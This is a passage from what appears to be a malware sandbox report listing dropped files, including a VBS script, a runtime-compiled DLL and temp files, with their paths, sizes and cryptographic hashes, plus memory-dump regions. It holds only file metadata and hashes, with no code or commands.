b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp

Filesize
1KB

MD5
ef5768950f2875616adf4d81e5cd5e70

SHA1
60a79022128e0a83e5812bfdeae6eae9785fae15

SHA256
83f8749d231a7322f176e54f045e7be2e5c1e2012e7d4671870822db8306f319

SHA512
c4ef5c4a87e772574be663f9f17e60f0bd6815af47b7e115b601251ad1268b4eeff0e596405046d911bce735833e3233db4b7713a5ddf2e534e762e81039dbda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar39AC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnxpjgur.dll

Filesize
3KB

MD5
531065ae2d5daf7ae6451d4fc92089b9

SHA1
5bd651a33fdb35d4ac2ddd67017987d88b08df6d

SHA256
3a1dc84c172e336ac691cf84a07cc45096eeee4a813cfc14e2698d6ac16af1f2

SHA512
41eec43babc83b4f67cee5a3b47f0dc7f08883df04810e19aa664024ee04f51a1f95e39b86ffffccb4ca4cc3a6fa5df4ca5fdb16c52272590f399aa7dee5cf32

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnxpjgur.pdb

Filesize
7KB

MD5
656b5ac6898936eca869fece1c306ff5

SHA1
b453b8b956d99b48e2ce9a85f607771af118b35a

SHA256
d790bd338643a28fe110bfe167631733d4cf38f5c9d65a13c733cd120649d16d

SHA512
10a04bc75e61b2633fb9201fa123a9f2d98b405b62aaef3b97ae96a3abd514a917d81ac91af8cd804e2d7574eeef8d75bed8c7de86447fd10197b432905d2290

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0414348e057db42f478bb8407d9b90a2

SHA1
5784088e389bd705137236180f74d9718ff9dfd3

SHA256
9ae64645e7960b28d06bffa2e77ff5cb64c60a5ac679a36dc3210e2d0a972955

SHA512
4016f24e4acfbb49c967168ca1da4f932d953cac51e9ee31a665ff181dfe0dac8967eee7c23dc67f3f59e91bd074b0162cff7699dc21462876b6b5f193e5b19a

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs

Filesize
138KB

MD5
6d668e698465e2b247c18af64cd92768

SHA1
9f0d8dc1bf9863ce10df0779404b46f11e05878e

SHA256
ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03

SHA512
53d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp

Filesize
652B

MD5
a907c6e7244ccf755cfed07ec584cc6a

SHA1
dfa1e039f71381da85a85613f651f0598b6e7586

SHA256
efdf5a80e519f177be02d507f02e7fc05f0a2b609e373cbff6dd76ab86bac56d

SHA512
3302de3cea1463d818a6cb67f7eea49b4a55dae126fac68a4f32e87bdac1d8f4eee474eaffe159c35a91553ff9de1f2774c2a9611510fb39e590aea541b46f90

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.0.cs

Filesize
483B

MD5
0d07f4ab30ba01353f767eca7b280b1a

SHA1
b5b6d65652a490f5eeeaf899884cec55cc09d455

SHA256
f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e

SHA512
001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline

Filesize
309B

MD5
1bdbbcf115196413a053f2345bef4da9

SHA1
31b85ebec8867e1a38d66764b71e24675bb05157

SHA256
f65f215290355666e8c8b80baaf89dc3f153c0aa25deefc56e14f313a66c4ea5

SHA512
b087ebe9ca81f8333940f247de694cfe721a82dda98a505dea4ef9a7ff66a6de47af3d70bcce4995faea831eb5654f87b4261ae4785ab28a2628eac63745cf42

Download Submit
memory/840-136-0x0000000002F80000-0x0000000002F82000-memory.dmp

Filesize
8KB

Download
memory/840-165-0x000000007261D000-0x0000000072628000-memory.dmp

Filesize
44KB

Download
memory/840-1-0x000000007261D000-0x0000000072628000-memory.dmp

Filesize
44KB

Download
memory/840-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2540-135-0x0000000002C00000-0x0000000002C02000-memory.dmp

Filesize
8KB

Download